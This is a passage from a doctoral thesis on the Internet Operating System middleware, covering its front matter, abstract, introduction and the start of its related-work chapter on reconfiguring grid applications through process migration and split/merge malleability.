level applications and with local resources and generates application per-
formance profiles and machine performance profiles............50
3.7 Interactions between the profiling module and the Network Weather Ser-
vice (NWS) components...........................51
3.8 Interactions between a reconfigurable application and the local IOS agent.52
3.9 IOS Profiling API..............................54
3.10 IOS Reconfiguration API..........................58
3.11 A UML class diagram of the main SALSA/IOS Actor classes and behav-
iors.The diagram shows the relationships between the Actor,Univer-
salActor,AutonomousActor,and MalleableActor classes.........59
4.1 The peer-to-peer virtual network topology. Middleware agents represent heterogeneous nodes, and communicate with groups or peer agents. Information is propagated through the virtual network via these communication links.................................61
4.2 The cluster-to-cluster virtual network topology.Homogeneous agents
elect a cluster manager to perform intra and inter cluster load balancing.
Clusters are dynamically created and readjusted as agents join and leave
the virtual network..............................62
4.3 Scenarios of joining and leaving the IOS virtual network:(a) A node joins
the virtual network through a peer server,(b) A node joins the virtual
network through an existing peer,(c) A node leaves the virtual network.64
4.4 Algorithm for joining an existing virtual network and finding peer nodes.64
4.5 An example that shows the propagation of work-stealing packets across
the peers until an overloaded node is reached.The example shows the
request starting with a time-to-live (TTL) of 5.The TTL is decremented
by each forwarding node until it reaches the value of 0,then the packet
is no longer propagated............................65
4.6 Information exchange between peer agents using work-stealing request
messages....................................68
4.7 Plots of the expected gain decision function versus the process remaining
lifetime with different values of the number of migrations in the past.
The remaining lifetime is assumed to have a half-life time expectancy .. 73
5.1 Steps involved in communicator handling to achieve MPI process migration . 85
5.2 Example M to N split operations ...................... 87
5.3 Example M to N merge operations ..................... 87
5.4 Examples of domain decomposition strategies showing block, column,
and diagonal decompositions for a 3D data-parallel problem ....... 88
5.5 Skeleton of the original MPI code of an MPI application ......... 93
5.6 Skeleton of the malleable MPI code with PCM calls: initialization phase . 94
5.7 Skeleton of the malleable MPI code with PCM calls: iteration phase ... 95
5.8 The layered design of MPI/IOS, which includes the MPI wrapper, the PCM
runtime layer, and the IOS runtime layer ................... 96
5.9 Architecture of a node running MPI/IOS-enabled applications ....... 97
5.10 Library and executable structure of an MPI/IOS application ....... 98
5.11 A reconfiguration scenario of an MPI/IOS application ........... 100
5.12 IOS/MPI proxy software architecture .................... 103
5.13 The packet format of MPI/IOS proxy control and profiling messages ... 105
6.1 The two-dimensional heat diffusion problem ................ 112
6.2 Parallel decomposition of the 2D heat diffusion problem .......... 113
6.3 Performance of the massively parallel unconnected benchmark ...... 116
6.4 Performance of the massively parallel sparse benchmark .......... 117
6.5 Performance of the highly synchronized tree benchmark .......... 117
6.6 Performance of the highly synchronized hypercube benchmark ...... 118
6.7 The tree topology on a dynamic environment using ARS and RS ..... 119
6.8 The unconnected topology on a dynamic environment using ARS and RS . 120
6.9 The hypercube application topology on Internet-like environments .... 121
6.10 The hypercube application topology on Grid-like environments ...... 121
6.11 The tree application topology on Internet-like environments ....... 122
6.12 The tree application topology on Grid-like environments ......... 122
6.13 The sparse application topology on Internet-like environments ...... 123
6.14 The sparse application topology on Grid-like environments ........ 123
6.15 The unconnected application topology on Internet-like environments ... 124
6.16 The unconnected application topology on Grid-like environments .... 124
6.17 Single vs. group migration for the unconnected application topology ... 125
6.18 Single vs. group migration for the sparse application topology ...... 126
6.19 Single vs. group migration for the tree application topology ........ 126
6.20 Single vs. group migration for the hypercube application topology .... 127
6.21 Overhead of using SALSA/IOS on a massively parallel astronomic
data-modeling application with various degrees of parallelism on a static
environment .................................. 127
6.22 Overhead of using SALSA/IOS on a tightly synchronized two-dimensional
heat diffusion application with various degrees of parallelism
on a static environment ........................... 128
6.23 Overhead of the PCM library ........................ 129
6.24 Total running time of reconfigurable and non-reconfigurable execution
scenarios for different problem data sizes for the heat diffusion application . 130
6.25 Breakdown of the reconfiguration overhead for the experiment of
Figure 6.24 ................................... 130
6.26 Performance of the heat diffusion application using MPICH2 and
MPICH2 with IOS .............................. 133
6.27 The expansion and shrinkage capability of the PCM library ....... 134
6.28 Adaptation using malleability and migration as resources leave and join . 135
6.29 Dynamic reconfiguration using malleability and migration compared to
dynamic reconfiguration using migration alone in a dynamic virtual
network of IOS agents. The virtual network was varied from 8 to 12 to
16 to 15 to 10 to 8 processors. Malleable entities outperformed solely
migratable entities on average by 5% .................... 136
LIST OF TABLES
2.1 Layers of the grid architecture ........................ 16
2.2 Characteristics of some grid resource management systems ........ 18
2.3 Examples of a Universal Actor Name (UAN) and a Universal Actor
Locator (UAL) ................................. 35
2.4 Some Java concepts and analogous SALSA concepts ............ 35
4.1 The range of communication latencies to group the list of peer hosts ... 69
5.1 The PCM API ................................ 90
5.2 The structure of the assigned UAN/UAL pair for MPI processes at the
MPI/IOS proxy ................................ 102
5.3 Proxy control message types ......................... 104
5.4 Proxy profiling message types ........................ 104
ACKNOWLEDGMENTS
It is with great pleasure that I wish to acknowledge several people who have helped
me tremendously during the difficult, challenging, yet rewarding and exciting path
towards a Ph.D. Without their help and support, none of this work would have been
possible.
First and foremost, I am greatly indebted to my advisor, Dr. Carlos A. Varela,
for his guidance, encouragement, motivation, and continued support throughout my
academic years at RPI. Carlos has allowed me to pursue my research interests with
sufficient freedom, while always being there to guide me. Working with him has been
one of the most rewarding experiences of my professional life.
I am also deeply indebted to Professor Boleslaw K. Szymanski, my committee
member, for supporting my work. He has been instrumental to the realization
of this work through his keen guidance and encouragement. Working with him has
been a great pleasure. I am also very thankful to the rest of my committee members,
Dr. Joseph E. Flaherty, Dr. Ian Foster, Dr. Franklin Luk, and Dr. James D. Teresco.
I am grateful to them for agreeing to serve on my committee and for their valuable
suggestions and comments.
Special thanks go to my colleague Travis Desell for his key contributions to
the design and development of the Internet Operating System middleware. Many
thanks go also to the rest of the Worldwide Computing laboratory members, Wei-Jen
Wang, Jason LaPorte, Jiao Tao, and Brian Boodman, for their valuable comments
and constructive criticism. My fruitful discussions and interactions with them helped
me grow professionally.
I am grateful to the administrative staff of the Computer Science department,
who have spared no effort in helping me with various aspects of my academic life at RPI.
They are some of the best people I have ever worked with. In particular, I would like
to thank Pamela Paslow for her constant help and for also being a true friend. She
was always there for me in easy and difficult times, and she kept me on top of all the
necessary paperwork. I would also like to thank Jacky Carley, Shannon Carrothers,
Chris Coonrad, and Steven Lindsey.
I have been fortunate to have met great friends throughout my Ph.D. journey.
They have bestowed so much love on me. I am forever grateful for their moral support,
encouragement, and true friendship. In particular, I would like to thank Bouchra
Bouqata, Houda Lamehamedi, Fatima Boussetta, and Khadija Omo-meriem. Special
thanks go to Rebiha Chekired for caring for my baby, Zayneb, during the last year of
my Ph.D. She acted as a loving and caring second mother to my baby during times
I could not be around. I am forever grateful to her.
Last but not least, I am forever indebted to my husband, Bouchaib Cherif, my
parents, my sisters Hajar and Meriem, my brother Ahmed, and the rest of my family.
My husband has been a great source of inspiration to me. None of this would have
been possible without his love, support, and continuous encouragement. My parents'
prayers have always accompanied me; their love keeps me going. My daughter
Zayneb has been the greatest source of motivation and inspiration during the last
year of my Ph.D. I am very lucky to have been blessed with her. I am grateful to all
of them. This work is dedicated to my family.
ABSTRACT
Advances in hardware technologies are constantly pushing the limits of processing,
networking, and storage resources, yet there are always applications whose computational
demands exceed even the fastest technologies available. It has become critical
to look into ways to efficiently aggregate distributed resources to benefit a single
application, and for applications to be able to reconfigure themselves to adjust to the
dynamics of the underlying resources.
To realize this vision, we have developed the Internet Operating System (IOS),
a framework for middleware-driven application reconfiguration in dynamic execution
environments. Its goal is to provide high performance to individual applications in
dynamic settings and to provide the necessary tools to facilitate the way in which
scientific and engineering applications interact with dynamic environments and reconfigure
themselves as needed. Reconfiguration in IOS is triggered by a set of decentralized
agents that form a virtual network topology. IOS is built modularly to
allow the use of different algorithms for agents' coordination, resource profiling, and
reconfiguration. IOS exposes generic APIs to high-level applications to allow for
interoperability with a wide range of applications. We investigated two representative
virtual topologies for inter-agent coordination: a peer-to-peer and a cluster-to-cluster
topology. As opposed to existing approaches, where application reconfiguration has
mainly been done at a coarse granularity (e.g., application-level), IOS focuses on
migration at a fine granularity (e.g., process-level) and introduces a novel reconfiguration
paradigm, malleability, to dynamically change the granularity of an application's
entities. Combining migration and malleability enables more effective, flexible, and
scalable reconfiguration.
IOS has been used to reconfigure actor-oriented applications implemented using
the SALSA programming language and iterative process-oriented applications that
follow the Message Passing Interface (MPI) model. To benefit from IOS reconfiguration
capabilities, applications need to be amenable to entity migration or malleability.
This issue has been addressed in iterative MPI applications by designing
and building a library for process checkpointing, migration, and malleability (PCM)
and integrating it with IOS. Performance results show that adaptive middleware can
be an effective approach to reconfiguring distributed applications with various ratios
of communication to computation in order to improve their performance and more
effectively utilize dynamic resources. We have measured the middleware overhead
in static environments, demonstrating that it is less than 7% on average, while
reconfiguration in dynamic environments can lead to significant improvements in an
application's execution time. Performance results also show that taking the application's
communication topology into consideration in the reconfiguration decision improves
throughput by almost an order of magnitude in benchmark applications with sparse
inter-process connectivity.
CHAPTER 1
Introduction
Computing environments have evolved from single-user environments, to Massively
Parallel Processors (MPPs), to clusters of workstations, to distributed systems, and
recently to grid computing systems. Every transition has been a revolution, allowing
scientists and engineers to solve complex problems and build sophisticated applications
that could not be tackled before. However, every transition has also brought along new
challenges, new problems, and the need for technical innovations.
The evolution of computing systems has led to the current situation, where
millions of machines are interconnected via the Internet with various hardware and
software configurations, capabilities, connection topologies, access policies, etc. The
formidable mix of hardware and software resources on the Internet has fueled
researchers' interest in investigating novel ways to exploit this abundant pool of
resources in an economic and efficient manner, and to aggregate these distributed
resources to benefit a single application. Grid computing has emerged as an
ambitious research area to address the problem of efficiently using multi-institutional
pools of resources. Its goal is to allow coordinated and collaborative resource sharing
and problem solving across several institutions, to solve large scientific problems that
could not easily be solved within the boundaries of a single institution. The concept
of a computational grid first appeared in the mid-1990s, proposed as an infrastructure
for advanced science and engineering. This concept has evolved extensively since
then and has encompassed a wide range of applications in both the scientific and
commercial fields [46]. Computing power is expected to become, in the future, a
purchasable commodity, like electrical power; hence the analogy often made between
the electrical power grid and the conceptual computational grid.
1.1 Motivation and Research Challenges
New challenges emerge in grid environments, where the computational, storage,
and network resources are inherently heterogeneous, often shared, and highly
dynamic. Consequently, observed application performance can vary widely and
in unexpected ways, which makes maintaining a desired level of application
performance a hard problem. Adapting applications to the changing behavior of
the underlying resources becomes critical to the creation of robust grid applications.
Dynamic application reconfiguration is a mechanism to realize this goal.
We denote by an application's entity a self-contained part of a distributed or
parallel application that is running in a given runtime system. Examples include
processes in the case of parallel applications, software agents, web services, virtual
machines, or actors in the case of actor-based applications. An application's entities could be
running in the same runtime environment or in different distributed runtime
environments connected through the network. They could be tightly coupled, exchanging
many messages, or loosely coupled, with few or no messages exchanged. Dynamic
reconfiguration implies the ability to modify the mapping between an application's
entities and physical resources and/or modify the granularity of the application's entities
while the application continues to run without any disruption of service. Applications
should be able to scale up to exploit more resources as they become available, or
gracefully shrink as some resources leave or experience failures. It is impractical
to expect application developers to handle reconfiguration issues given the sheer
size of grid environments and the highly dynamic nature of the resources. Adopting
a middleware-driven approach is imperative to achieving efficient deployment of
applications in a dynamic grid setting.
Application adaptation has been addressed in previous work in a fairly ad hoc
manner. Usually the code that deals with adaptation is embedded within the
application or within libraries that are highly dependent on the application model. Most of
these strategies require a good knowledge of the application model and a good
knowledge of the execution environments. While these strategies may work for dedicated
and fairly static environments, they do not scale up to grid environments, which
exhibit larger degrees of heterogeneity, more dynamic behavior, and a much larger number
of resources. Recent work has addressed adaptive execution in grids. Most of the
proposed mechanisms have adopted the application stop-and-restart mechanism; i.e.,
the entire application is stopped, checkpointed, migrated, and restarted on another
hardware configuration (e.g., see [72, 110]). Although this strategy can result in
improved performance in some scenarios, more effective adaptivity can be achieved if
migration is supported at a finer granularity.
1.1.1 Mobility and Malleability for Fine-grained Reconfiguration
Reconfigurable distributed applications can opportunistically react to the
dynamics of their execution environment by migrating data and computation away
from unresponsive or slow resources, or onto newly available resources. Application
stop-and-restart can be thought of as application mobility. Application entity
mobility, however, allows applications to be reconfigured at a finer granularity: migrating
entities can be easier and more concurrent than migrating a full application.
Additionally, concurrent entity migration is less intrusive.
To illustrate the usefulness of such dynamic application entity mobility, consider
an iterative application computing heat diffusion over a two-dimensional surface. At
each iteration, each cell recomputes its value by applying a function of its current
value and its neighbors' values. Therefore, processors need to synchronize with their
neighbors at every iteration before they can proceed to the subsequent iteration.
Consequently, the simulation runs as slowly as the slowest processor in the distributed
computation, assuming a uniform distribution of data. Clearly, data distribution
plays an important role in the efficiency of the simulation. Unfortunately, in shared
environments, the load of the involved processors is unpredictable, fluctuating as new
jobs enter the system or old jobs complete.
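The iterative structure described above can be sketched as follows. This is an illustrative sequential kernel, not the thesis's parallel implementation; the grid size, boundary values, and four-point averaging stencil are assumptions chosen for the example.

```python
def heat_step(grid):
    """One Jacobi-style iteration: each interior cell becomes the
    average of its four neighbors (a simple diffusion stencil).
    Boundary cells are left unchanged (fixed boundary conditions)."""
    n, m = len(grid), len(grid[0])
    new = [row[:] for row in grid]
    for i in range(1, n - 1):
        for j in range(1, m - 1):
            new[i][j] = 0.25 * (grid[i - 1][j] + grid[i + 1][j] +
                                grid[i][j - 1] + grid[i][j + 1])
    return new

# A tiny 2D surface: hot left edge (1.0), cold everywhere else (0.0).
grid = [[1.0 if j == 0 else 0.0 for j in range(5)] for i in range(5)]
for _ in range(50):
    grid = heat_step(grid)
# Heat has diffused rightward: interior cells nearest the hot edge
# end up warmer than those farther away.
```

In the parallel decomposition, each processor owns a block of cells and must exchange boundary values with its neighbors before every such step, which is why the whole computation advances at the pace of the slowest processor.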
We evaluated the execution time of the heat simulation with and without the
capability of application reconfiguration under a dynamic run-time environment: the
application was run on a cluster and, soon after the application started, artificial load
was introduced on one of the cluster machines. Figure 1.1 shows the speedup obtained
by migrating the slowest process to an available node in a different cluster.
Figure 1.1: Execution time without and with autonomous migration in a
dynamic run-time environment. (Plot of execution time in seconds versus
data size in megabytes for non-reconfigurable and reconfigurable runs.)
While entity migration can provide significant performance benefits to distributed
applications over shared and dynamic environments, it is limited by the
granularity of the application's entities. To illustrate this limitation, we use another
iterative application, run on a dynamic cluster consisting of five processors (see
Figure 1.2). In order to use all the processors, at least one entity per processor is
required. When a processor becomes unavailable, the entity on that processor can
migrate to a different processor. With five entities, regardless of how migration is
done, there will be an imbalance of work on the processors, so each iteration needs
to wait for the pair of entities running slower because they share a processor. In the
example, 5 entities running on 4 processors was 45% slower than 4 entities running
on 4 processors, with otherwise identical parameters. One alternative to fix this load
imbalance is to increase the number of entities to enable a more even distribution of
entities no matter how many processors are available. In the example of Figure 1.2,
60 entities were used, since 60 is divisible by 5, 4, 3, 2 and 1. Unfortunately, the
increased number of entities introduces overhead which causes the application to run
slower, approximately 7.6% slower. Additionally, this approach is not scalable, as
the number of entities required for this scheme is the least common multiple of the
different combinations of processor availability. In many cases, the availability of
resources is unknown at the application's startup, so an effective number of entities
cannot be statically determined. Figure 1.2 shows these two approaches compared
to a good distribution of work, one entity per processor. N is the number of entities
and P is the number of processors. N=P with split and merge (SM) capabilities
uses entities with various granularities, while N=P shows the optimal configuration
for this example (with no dynamic reconfiguration and middleware overhead). N=60
and N=5 show the best configuration possible using migration with a fixed number
of entities. In this example, if a fixed number of entities is used, averaged over all
processor configurations, using five entities is 13.2% slower, and using sixty entities
is 7.6% slower.
Figure 1.2: Execution time with different entity granularities in a static
run-time environment. (Plot of iteration time in seconds versus number of
processors for N=5, N=60, N=P, and N=P with split/merge.)
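The load-imbalance argument can be made concrete with a little arithmetic: with a fixed number N of identical entities on P processors, an iteration takes as long as the most loaded processor, so iteration time is proportional to ceil(N/P) rather than the ideal N/P. The sketch below computes that idealized penalty; real measurements, such as the 45% figure above, differ from the idealized bound because of communication and middleware overheads.

```python
import math

def ideal_slowdown(n_entities, n_procs):
    """Relative iteration-time penalty of packing n_entities identical
    entities onto n_procs processors, versus a perfectly even spread."""
    worst = math.ceil(n_entities / n_procs)  # entities on the busiest processor
    even = n_entities / n_procs              # fractional ideal load
    return worst / even - 1.0

# 5 entities on 4 processors: one processor runs 2 entities while the
# others run 1, so each iteration is 60% longer than an even split
# in this idealized model (the measured slowdown above was 45%).
print(f"{ideal_slowdown(5, 4):.0%}")  # prints "60%"
```

Note that `ideal_slowdown(60, 5)` and `ideal_slowdown(4, 4)` are both zero: when N is a multiple of P the load balances perfectly, which is exactly the property the least-common-multiple scheme buys, at the cost of per-entity overhead.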
To illustrate further how a process's granularity impacts node-level performance,
we run an iterative application with different numbers of processes on the
same dedicated node. The larger the number of processes, the smaller the data
granularity of each process. Figure 1.3 shows an experiment where the parallelism of
an iterative application was varied on a dual-processor node. In this example, having
one process per processor did not give the best performance, but increasing the
parallelism beyond a certain point also introduces a performance penalty.
Figure 1.3: Throughput as the process data granularity decreases on a
dedicated node.
We introduce the concept of mobile malleable entities to solve the problem of
appropriately using resources in the face of a dynamic execution environment where
the available resources may not be known. Instead of having a static number of
entities, malleable entities can split, creating more entities, and merge, reducing the
number of entities, redistributing data based on these operations. With malleable
entities, the application's granularity, and as a consequence the number of entities,
can also be changed dynamically. Applications define how entities split and merge,
while the middleware determines when, based on resource availability information,
and what entities to split or merge, depending on their communication topologies. As
the dynamic environment of an application changes, the granularity and data
distribution of that application can be changed in response, to utilize its environment most
efficiently.
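A minimal sketch of the split and merge operations on a data-parallel entity follows, assuming the entity's state is just a list of rows that can be repartitioned. The class and method names are illustrative only; they are not the actual SALSA MalleableActor or PCM interfaces described later in the thesis.

```python
class Entity:
    """A toy malleable entity owning a contiguous slice of the data."""
    def __init__(self, rows):
        self.rows = rows

    def split(self):
        """Split into two entities, halving this entity's granularity."""
        mid = len(self.rows) // 2
        return Entity(self.rows[:mid]), Entity(self.rows[mid:])

    @staticmethod
    def merge(a, b):
        """Merge two entities into one coarser-grained entity."""
        return Entity(a.rows + b.rows)

# Middleware-driven reconfiguration: split when a processor joins,
# merge when one leaves, keeping roughly one entity per processor.
e = Entity(list(range(12)))
left, right = e.split()               # a new processor became available
assert len(left.rows) == len(right.rows) == 6
restored = Entity.merge(left, right)  # the processor left again
assert restored.rows == e.rows
```

The division of labor matches the text: the application supplies `split` and `merge` (the *how*), while the middleware decides the *when* and the *what* from its resource and topology profiles.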
1.1.2 Middleware-driven Dynamic Application Reconfiguration
There are a number of challenges in enabling dynamic reconfiguration of
distributed applications. We divide them into middleware challenges, programming
technology challenges, and challenges at the interface between the middleware and the
applications.
Middleware-level Challenges
Middleware challenges include the need for continuous and non-intrusive profiling
of the run-time environment's resources, and the need to determine when an
application reconfiguration can be expected to lead to performance improvements or better
resource utilization. A middleware layer needs to accomplish this in a decentralized way, so as
to be scalable. The meta-level information that the middleware manages must include
information on the communication topology of the application entities, so as to co-locate
those that communicate extensively whenever possible, avoiding high-latency
communication. A good compromise must also be found between highly accurate meta-level
information, which can be very expensive to obtain and intrusive to running applications,
and partial, inaccurate meta-level information, which may be cheap to obtain
in non-intrusive ways but may lead to far from optimal reconfiguration
decisions. Since no single policy fits all, modularity is needed to be able to
plug in and fine-tune the different resource profiling and management policies embedded
in the middleware.
Application-level Challenges
The middleware can only trigger reconfiguration requests for applications that support
them. Programming models that advocate a clean encapsulation of state inside
the application entities and asynchronous communication among entities make the
process of dynamically reconfiguring applications much more manageable, because
there is no need for replicated shared-memory consistency protocols or for preserving
method invocation stacks upon entity migration. While entity mobility is
relatively easy and transparent for these programming models, entity malleability
requires more cooperation from the application developers, as it is highly
application-dependent. For programming models where shared memory or synchronous
communication is used, application programming interfaces need to be defined to enable
developers to specify how application entity mobility and malleability are supported
by specific applications. These models make the reconfiguration process less
transparent and sometimes limit the applicability of the approach to specific classes of
applications, e.g., massively parallel or iterative applications.
Cross-cutting Challenges
Finally, applications need to collaborate with the middleware layer by exporting
meta-level information on entity interconnectivity and resource usage, and by
providing operations to support potential reconfiguration requests from the middleware
layer. This interface needs to be as generic as possible to accommodate a wide variety
of programming models and application classes.
1.2 Problem Statement and Methodology
The focus of this research is to build a modular framework for middleware-driven
application reconfiguration in dynamic execution environments such as Grids
and shared clusters. The main objectives of this framework are to provide high
performance to individual applications in dynamic settings and to provide the necessary
tools to facilitate the way in which scientific and engineering applications interact
with dynamic execution environments and reconfigure themselves as needed. Such
applications can then benefit from these rapidly evolving systems and from the wide
spectrum of resources available in them.
This research addresses most of the issues described in the previous section
through the following methodology.
A Modular Middleware for Adaptive Execution
The Internet Operating System (IOS) is a middleware framework that has been
built with the goal of addressing the problem of reconfiguring long-running applications
in large-scale dynamic settings. Our approach to dynamic reconfiguration is
twofold. On the one hand, the middleware layer is responsible for resource discovery,
for monitoring application-level and resource-level performance, and for deciding when,
what, and where to reconfigure applications. On the other hand, the application
layer is responsible for dealing with the operational issues of migration and malleability
and with the profiling of the application's communication and computational patterns. IOS
is built with modularity in mind, to allow the use of different modules for agent
coordination, resource profiling, and reconfiguration algorithms in a plug-and-play
fashion. This feature is very important since there is no "one size fits all" method for
performing reconfiguration across a wide range of applications and in highly heterogeneous
and dynamic environments. IOS is implemented in Java and SALSA [114], an
actor-oriented programming language. IOS agents leverage the autonomous nature of
the actor model and use several coordination constructs and the asynchronous message
passing provided by the SALSA language.
Decentralized Coordination of Middleware Agents
IOS embodies resource profiling and reconfiguration decisions in software agents.
IOS agents are capable of organizing themselves into various virtual topologies.
Decentralized coordination is used to allow for scalable reconfiguration. This research
investigates two representative virtual topologies for inter-agent coordination: a
peer-to-peer and a cluster-to-cluster coordination topology [73]. The coordination topology
of IOS agents has a great impact on how quickly reconfiguration decisions are made.
In a more structured environment, such as a grid of homogeneous clusters, a
hierarchical topology generally performs better than a purely peer-to-peer topology [73].
Generic Interfaces for Portable Interoperability with Applications
IOS exposes several APIs for profiling applications' communication patterns and
for triggering reconfiguration actions such as migration, split, and merge. These
interfaces shield many of the intrinsic details of reconfiguration from application
developers and provide a unified and clean way for applications and the middleware
to interact. Any application or programming model that implements the IOS generic
interfaces becomes reconfigurable.
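The shape of such generic interfaces can be sketched as a pair of abstract roles. The names below are illustrative stand-ins, not the actual IOS profiling and reconfiguration APIs (those appear in Figures 3.9 and 3.10); the sketch only shows the contract an application must fulfill to become reconfigurable.

```python
from abc import ABC, abstractmethod

class Profilable(ABC):
    """What an application exposes to the middleware's profiling module."""
    @abstractmethod
    def communication_profile(self):
        """Return (peer_id, message_count) pairs for this entity."""

class Reconfigurable(ABC):
    """Reconfiguration requests the middleware may trigger on an entity."""
    @abstractmethod
    def migrate(self, target_node): ...
    @abstractmethod
    def split(self): ...
    @abstractmethod
    def merge(self, other): ...
```

Any programming model that implements both roles for its entities, as SALSA actors and PCM-instrumented MPI processes do for the real APIs, can then be profiled and reconfigured by the middleware without the middleware knowing anything else about the application.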
A Generic Process Checkpointing, Migration and Malleability Scheme for
Message Passing Applications
Migration and malleability capabilities are highly dependent on the application's
programming model. Therefore, there has to be built-in library- or language-level
support for migration and malleability to allow applications to be reconfigurable.
Part of this research consists of building the necessary tools to allow message passing
applications to become reconfigurable with IOS. A library for process checkpointing,
migration and malleability (PCM) has been designed and developed for iterative MPI
applications. PCM is a user-level library that provides checkpointing,
profiling, migration, split, and merge capabilities for a large class of iterative
applications. Programmers need to specify the data structures that must be saved and
restored to allow process migration, and to instrument their application with a few PCM
calls. PCM also provides process split and merge functionality to MPI programs.
Common data distributions are supported, such as block, cyclic, and block-cyclic. PCM
implements the IOS generic profiling and reconfiguration interfaces, and therefore enables
MPI applications to benefit from IOS reconfiguration policies.
The PCM API is simple to use and hides many of the intrinsic details of how
to perform reconfiguration through migration, split, and merge. Hence, with minimal
code modification, a PCM-instrumented MPI application becomes malleable and
ready to be reconfigured transparently by the IOS middleware. In addition, legacy
MPI applications can benefit tremendously from the reconfiguration features of IOS
by simply inserting a few calls to the PCM API.
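The instrumentation pattern can be sketched as follows. The `pcm_*` names here are hypothetical placeholders, not the library's actual C API (the real PCM-instrumented skeletons appear in Figures 5.6 and 5.7); the sketch only illustrates the control flow the text describes: register the data structures to be saved and restored, then probe for middleware reconfiguration requests between iterations.

```python
import copy

# Hypothetical, simplified stand-ins for PCM-style calls (illustrative only).
_registered = {}
_pending = ["checkpoint"]          # simulate one pending middleware request

def pcm_register(name, data):
    """Declare a data structure to be saved and restored across migration."""
    _registered[name] = data

def pcm_status():
    """Return the middleware's pending reconfiguration request, if any."""
    return _pending.pop(0) if _pending else None

def pcm_checkpoint():
    """Snapshot all registered state (deep copy, as a migration would need)."""
    return copy.deepcopy(_registered)

# Iteration phase of a PCM-instrumented iterative solver (sketch).
data = [0.0] * 8
pcm_register("data", data)
snapshot = None
for step in range(3):
    if pcm_status() == "checkpoint":  # probe between iterations
        snapshot = pcm_checkpoint()   # state a migrating process would carry
    for i in range(len(data)):        # the application's real computation
        data[i] += 1.0
```

The key property, which the real library shares, is that the reconfiguration probe sits at iteration boundaries, so the application is only ever checkpointed or migrated in a consistent state.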
1.3 Thesis Contributions
This research has generated a number of original contributions.They are sum-
marized as follows:
1. A modular middleware for application reconfiguration with the goal of maintaining reasonable performance in a dynamic environment. The modularity of our middleware is demonstrated through the use of several reconfiguration and coordination algorithms.
2. Fine-grained reconfiguration that enables reasoning about application entities rather than the entire application, and therefore provides more concurrent and efficient adaptation of the application.
3. Decentralized and scalable coordination strategies for middleware agents that are based on partial knowledge.
4. Generic reconfiguration interfaces for application-level profiling and reconfiguration decisions to allow increased and portable adoption by several programming models and languages. This has been demonstrated through the successful reconfiguration of actor-oriented programs in SALSA and process-oriented programs using MPI.
5. A portable protocol for inter-operation and interaction between applications and the middleware to ease the transition to reconfigurable execution in grid environments.
6. A user-level checkpointing and migration library for MPI applications to help develop reconfigurable message passing applications.
7. The use of split and merge, or malleability, as another reconfiguration mechanism to complement and enhance application adaptation through migration. Support of malleability in MPI applications developed by this research is the first of its kind in terms of splitting and merging MPI processes.
8. A resource-sensitive model for deciding when to migrate, split, or merge an application's entities. This model enables reasoning about computational resources in a unified manner.
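As a rough illustration of contribution 8, the sketch below shows the general shape of such a resource-sensitive decision. The gain formula and the 10% threshold are illustrative assumptions invented here, not the actual model developed later in this thesis.

```python
# Illustrative sketch of a resource-sensitive reconfiguration decision.
# The formula and threshold are assumptions, not the thesis's actual model.

def expected_gain(local_throughput, remote_throughput, migration_cost):
    """Relative benefit of moving an entity, net of the one-time move cost."""
    if local_throughput <= 0:
        return float("inf")   # any remote placement beats a starved entity
    return (remote_throughput - local_throughput - migration_cost) / local_throughput

def decide(local_throughput, remote_throughput, migration_cost, threshold=0.10):
    gain = expected_gain(local_throughput, remote_throughput, migration_cost)
    return "migrate" if gain > threshold else "stay"

print(decide(10.0, 14.0, 1.0))  # remote node clearly faster -> "migrate"
print(decide(10.0, 10.5, 1.0))  # benefit eaten by migration cost -> "stay"
```

The same gain-versus-cost structure can, in principle, cover split and merge decisions by treating granularity changes as alternative placements.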
1.4 Thesis Roadmap
The remainder of this thesis is organized as follows:
• Chapter 2 discusses background and related work in the context of dynamic reconfiguration of applications in grid environments. It starts by giving a literature review of emerging grid middleware systems and how they address resource management. It then reviews existing efforts for application adaptation in dynamic grid environments. An overview of programming models that are suitable for grid environments is given. Finally, background information about worldwide computing, the actor model of computation, and the SALSA programming language is presented.
• Chapter 3 first presents key design goals that have been fundamental to the implementation of the Internet Operating System (IOS) middleware. These include operational and architectural goals at both the middleware level and the application level. Then the architecture of IOS is explained. This chapter also explains in detail the various modules of IOS and its generic interfaces for profiling and reconfiguration.
• Chapter 4 presents the different protocols and policies implemented as part of the middleware infrastructure. The protocols deal with coordinating the activities of middleware agents and forwarding work-stealing requests in a peer-to-peer fashion. At the core of the adaptation strategies, a resource-sensitive model is used to decide when, what, and where to reconfigure application entities.
• Chapter 5 explains how iterative MPI-based applications are reconfigured using IOS. First, the checkpointing, migration, and malleability (PCM) library is presented. The chapter then proceeds by showing how the PCM library is integrated with IOS and the protocol used to achieve this integration.
• Chapter 6 presents the various kinds of experiments conducted in this research and the results obtained. In the first section, the performance evaluation of the middleware is given, including evaluation of the protocols, scalability, and overhead. The second section presents various experiments that evaluate the reconfiguration functionalities of IOS using migration, split and merge, and a combination of them.
• Chapter 7 concludes this thesis with a discussion of future directions.
CHAPTER 2
Background and Related Work
The deployment of grid infrastructures is a challenging task that goes beyond the capabilities of application developers. Specialized grid middleware is needed to mitigate the complex issues of integrating a large number of dynamic, heterogeneous, and widely distributed resources. Institutions need sophisticated mechanisms to leverage and share their existing information infrastructures in order to be part of public collaborations.
Grid middleware should address the following issues:
• Security. The absence of central management and the open nature of grid resources result in having to deal with several administrative domains. Each one of them brings along different resource access policies and security requirements. Being able to access externally-owned resources requires the credentials mandated by the external organizations. Users should be able to log on once and execute applications across various domains¹. Furthermore, common methods for negotiating authorization and authentication are also needed.
• Resource management. Resource management is a fundamental issue for enabling grid applications. It deals with job submission, scheduling, resource allocation, resource monitoring, and load balancing. Resources in the grid have a very transient nature. They can experience constantly changing loads and availability because of shared access and the absence of tight user control. Reliable and efficient execution of applications on such platforms requires application adaptation to the dynamic nature of the underlying grid environments. Adaptive scheduling and load balancing are necessary to achieve high performance of grid applications and high utilization of systems' resources.
¹ This capability of being able to log on once, instead of logging in to every machine used, is referred to in the computational grid community as the single sign-on policy.
• Data management. Since grid infrastructures involve widely distributed resources, data and processing might not necessarily be collocated. Data management concerns arise, such as how to efficiently distribute, replicate, and access potentially massive amounts of data.
• Information management. For resource managers to make informed decisions, they must be able to discover available resources and learn about their characteristics (capacities, availability, current utilization, access policies, etc.). Grid information services should allow the monitoring and discovery of resources and should make this information available when necessary to grid resource managers.
